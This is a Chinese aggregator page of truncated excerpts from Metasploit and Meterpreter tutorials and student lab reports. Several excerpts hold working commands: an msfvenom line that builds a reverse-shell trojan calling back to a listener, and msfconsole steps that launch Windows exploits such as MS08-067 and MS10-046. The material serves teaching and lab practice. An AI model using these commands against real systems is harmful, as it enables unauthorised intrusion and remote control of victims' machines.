meterpreter lhost设置】的更多相关文章

如果要监听kali本地的话,设置 0.0.0.0…
  0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道.使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接.Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户.隐藏一些东西.打开shell.得到用户密码.上传下载远程主机的文件.运行cmd.exe.捕捉屏幕.得到远程控制…
  0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为172.16.11.2,监听端口…
[msf] msfconsole meterpreter 对于这款强大渗透测试框架,详情介绍可看这里:metasploit 使用教程 对于msfconsole, Kali Linux 自带.只需用命令行启动便可. msfconsole 启动不了/初次使用 service postgresql start # 启动数据库服务 msfdb init # 初始化数据库 msfconsole # 启动metasploit [注]msfconsole 不会就用 msfconsole -h msf5 > h…
名称:Microsoft DLL植入远程代码执行漏洞(CVE-2015-0096)(MS15-020) 了解:Microsoft Windows没有正确处理DLL文件的加载,存在远程代码执行漏洞,通过诱使用户打开远程WebDAV或SMB共享上的某些文件利用此漏洞, 成功利用后可导致加载任意库.Windows使用.lnk来定义文件或者目录的快捷方式,可以使用.CPL文件来自定义图标.问题是,在Windows中,图标从模块(或者可执行文件或动态链接库)加载. 事实上,.cpl文件实际上是DLL文件.…
这次用到MS10-046这个远程执行漏洞(Windows快捷方式LNK文件自动执行代码漏洞攻击) 命令: 1.   msfconsole    //启动MSF Metasploit 2.   search ms10-046   //搜索漏洞 3.   use windows/browser/ms10_046_shortcut_icon_dllloader  //加载漏洞模块 4.   set payload windows/meterpreter/reverse_tcp   //设置一个PAYL…
0x00背景 windows平台下,浏览器安全是绕不过的话题,其涉及的安全问题涵盖二进制和web,攻击场景也非常多样化: 用户点击攻击者的恶意URL链接被感染恶意代码 访问恶意站点被绕过同源策略窃取cookies 等等. 本文关注的是第一类攻击场景:用户访问恶意URL被感染恶意代码. 传统的攻击场景是:攻击者伪造系统管理员身份发送一封邮件给用户,邮件内容中附带攻击者的URL链接,注明为系统安全补丁升级包.用户收到这封邮件后会去下载并运行该"系统安全补丁升级包",被感染恶意代码.把整个过…
一.服务器搭建与连接(1)团队服务器上: sudo ./teamserver 服务器IP 连接密码 (VPS的话要写外网ip,并且可以进行端口映射,默认使用50050端口) 但是这个一关闭团队服务器也就关闭了,这里我们可以把他置于后台来运行: nohup ./teamserver IP 用户名 & 这样就可以了,这个目录下会生成一个nohup.out的文件内存使用超过%50 无法启动java虚拟机.在结束Cobalt Strike的时候也要同时结束所有 msfrpcd 进程,不要下次启动会启动不…
中午时候收到了推送的漏洞预警,在网上搜索相关信息看到很多大牛已经开发出生成doc文档的脚本和msf的poc,本文记录CVE-2017-11882 漏洞在 Msf下的利用. 0x00 漏洞简介 2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882).该漏洞为Office内存破坏漏洞,影响目前流行的所有Office版本.攻击者可以利用漏洞以当前登录的用户的身份执行任意命令. 由于漏洞影响…

msf

show exploit show payload msf使用数据库加快搜索,不然每次都等半天 service postgresql startmsfdb reinitmsf > db_rebuild_cache 需要等待几分钟 查询漏洞对应的模块 use exploit/windows/smb/ms08_067_netapi info 查看漏洞信息 show option 查看配置选项 set target 34 设置目标系统 set payload  windows/meterpreter/…
实验内容 使用netcat获取主机操作Shell,cron启动 (0.5分) 使用socat获取主机操作Shell, 任务计划启动 (0.5分) 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) 使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 (2分) 可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1…
目录 -- MSF基础应用 实验说明 实验任务内容 基础问题回答 实验内容 主动攻击 ms17_10_eternalblue(成功) ms17_10_psexec(成功) ms08_067_netapi(成功) ms15_020_shortcut_icon_dllloader(失败) 浏览器攻击 ms10_002_aurora(成功) ms10_018_ie_behaviors(成功) ms11_003_ie_css_import(成功且唯一) ms14_064_ole_code_executi…
一.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.一个主动攻击实践,如ms08_067; (成功) 2.一个针对浏览器的攻击,如ms11_050:(成功) 3. 一个针对客户端的攻击,如Adobe:(成功) 4.成功应用任何一个辅助模块.(成功且唯一) 二.实践过程 准备工作:首先先确定Linux和XP的IP Linux:222.28.133.16 XP:222.28.133.242 1.实现主动攻击,这里使用的是ms08_067…
基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 下载破解游戏,盗版电影或安装来历不明的软件,可能被留下后门. (2)例举你知道的后门如何启动起来(win及linux)的方式? win环境下可以开机自动启动,linux环境可以用corn启动. (3)Meterpreter有哪些给你映像深刻的功能? 可以自己定制后门程序,针对不同用户不同主机不同人群. (4)如何发现自己有系统有没有被安装后门? 杀毒软件报错,开启防火墙等防护措施. 任务一 使用ipconfig查询win7的I…
实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践(1分) ms08_067; (失败) MS17-010永恒之蓝(成功) MS12-20(比永恒之蓝更蓝的蓝屏)(本来以为唯一后来不唯一了) 1.2 一个针对浏览器的攻击(1分) ms14_064(成功) 1.3 一个针对客户端的攻击(1分) Adobe(成功) 1.4 成功应用任何一个辅助模块.(0.5分) 扫描查看靶机开放端口(唯一) 以上四个小实践可…
- 2018-2019-2 20165206<网络攻防技术>Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何一个辅助模块.(0.5分) 以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分. - 基础问题回答 (1)用自己的话解释什么是exploit,payload,encod…
目录 实验要求: 基础问题回答: 离实战还缺些什么技术或步骤? 实验内容: Exp5-1 主动攻击实践:实现ms08_067(失败) 实现ms17_010_eternalblue(成功) Exp5-2 对浏览器攻击实践: 实现ms14_064(成功) Exp5-3 攻击客户端的实践:实现Adobe(成功) Exp5-4 成功应用一个辅助模块:scanner/http/prev_dir_same_name_file(成功且唯一) 实验体会 实验要求: 本实践目标是掌握metasploit的基本应用…
一.知识点总结 1.MSF攻击方法 主动攻击:扫描主机漏洞,进行攻击 攻击浏览器 攻击其他客户端 2.MSF的六种模块 渗透攻击模块Exploit Modules:攻击漏洞,把shellcode"背"过去 主动渗透攻击:攻击某个系统服务 被动渗透攻击:攻击某个客户端应用 辅助模块Auxiliary Modules:在进行渗透攻击之前得到目标系统丰富的情报信息,它是攻击的前提 网络服务的扫描与查点 探查敏感信息泄露.Fuzz测试发掘漏洞 收集登录密码 攻击载荷Payload Module…
实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何一个辅助模块.(0.5分) 以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分. 基础问题回答 (1)用自己的话解释什么是exploit,payload,encode. exploit-渗透攻击,连接漏洞,将payload传送到靶机中 payload-载荷,是…
<网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbutton) 成功应用任何一个辅助模块(ipidseq)(唯一) 基础问题 实验中遇到的问题 实验总结与体会 实验目的 掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路 返回目录 实验环境: 靶机1:Windows XP Professional SP2 靶机2:Windows XP viv…
1. 实践目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何一个辅助模块.(0.5分) 2.实践内容 攻击机IP 靶机IP 2.1一个主动攻击实践,ms08_067; (1分) 输入 “msfconsole” 及“search ms08_067”进行漏洞搜…
2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms08-067; (1分) 一个针对浏览器的攻击,如ms11-050:(1分) 一个针对客户端的攻击,如Adobe:(1分) 成功应用任何一个辅助模块.(0.5分) 2.基础问题回答 exploit是利用漏洞,将攻击代码传送到靶机上,并对靶机进行一系列控制操作的整…
2017-2018-2 20155228 <网络对抗技术> 实验五:MSF基础应用 1. 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1 一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何一个辅助模块.(0.5分) 以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣…
1. 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何一个辅助模块.(0.5分) 以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分. 2.实验步骤及结果 2.1主动攻击实践,ms17_010 靶机: Wind…
目录 实验内容 实验原理 实验步骤 (一)一个主动攻击实践 ms08_067(成功) (二)一个针对浏览器的攻击 ms14_064(成功) (三)一个针对客户端的攻击 Adobe(成功) CVE-2017-11882(成功且唯一) (四)应用辅助模块的攻击 sniffer(成功) 实验中遇到的问题 基础问题回答 离实战还缺些什么技术或步骤 实验内容 一个主动攻击实践,如ms08_067; 一个针对浏览器的攻击,如ms11_050: 一个针对客户端的攻击,如Adobe: 成功应用任何一个辅助模块.…
2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用 目录 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 payload:generic/shell_bind_tcp(成功) ms17_010_eternalblue:"永恒之蓝"自动化攻击 payload:windows/x64/shell/reverse_tcp_uuid(成功) windows/x64/vncinjec…
一.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.一个主动攻击实践,如ms08_067; (成功) 2.一个针对浏览器的攻击,如ms10_018_ie_behaviors:(成功且唯一) 3. 一个针对客户端的攻击,如Adobe:(成功) 4.成功应用任何一个辅助模块.(成功) 二.实践过程 1.实现主动攻击,使用ms08_067漏洞 被攻击机:WindowsXP sp3. (1)输入指令使用ms08_067漏洞攻击程序 use…
NetSec2019 20165327 Exp2 后门原理与实践 快速找到重点: (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, 任务计划启动 (0.5分) (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 (2分) (5)…
实践目标 1.一个主动攻击实践 ms17_010(成功) ms08_067(成功) 2.一个针对浏览器的攻击 ms13-008(成功唯一) ms11-050(失败) ms13-069(成功唯一) adobe_toolbutton浏览器漏洞(成功唯一) 3.一个针对客户端的攻击 adobe (Adobe_toolbutton客户端漏洞成功) 4.成功应用任何一个辅助模块 auxiliary/server/browser_autopwn(成功唯一) 问题回答 什么是exploit 用来打开攻击者与被…
Exp5 MSF基础应用 实践内容 主动攻击实践 ms17_010_enternalblue 靶机:win7 x64成功 针对浏览器的攻击 ms14_064_ole_code_execution 靶机:winXP成功 靶机:win7失败 针对客户端的攻击 adobe_cooltype_sing 靶机:winXP成功 ms15_020_shortcut_icon_dllloader 靶机:winXP成功 成功应用任何一个辅助模块 gather/browser_info 靶机:winXP成功且唯一…